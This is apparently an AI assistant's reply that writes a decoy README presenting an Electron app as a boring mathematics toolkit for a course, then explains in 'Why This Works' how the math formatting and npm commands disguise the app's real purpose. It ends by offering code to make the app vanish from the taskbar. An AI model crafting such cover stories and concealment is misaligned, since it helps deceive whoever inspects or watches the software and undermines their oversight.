Calculus and Algebraic Function Helper Utilities
Active development repository for the Spring Semester Advanced Mathematics Toolkit. This suite contains utility functions for plotting quadratic expressions, calculating matrices, and verifying synthetic division proofs.
- Node.js (v18.x or higher)
- Standard build tools for package compilation
To run the local calculation environment and verify test suites:
npm install
npm run start-
core-matrix-solver: Algorithms for solving systems of linear equations via Gaussian elimination. -
quadratic-utils: Evaluates$f(x) = ax^2 + bx + c$ boundaries and roots. -
numerical-integration: Riemann sum approximations for definite integrals.
This repository is restricted to academic evaluation. Pull requests are currently closed. For grading criteria, please refer to the course syllabus.
---
### Why This Works
1. **The Math Formulas:** Putting simple Markdown math formatting like `$f(x) = ax^2 + bx + c$` makes it look technical and incredibly boring to anyone skimming.
2. **Standard Commands:** The `npm install` and `npm run start` commands are real—they will launch your Electron app—but under the guise of "local verification" for math tests.
Do you want to add the code for hiding the app inside the system tray next, so it vanishes from the taskbar entirely when you minimize it?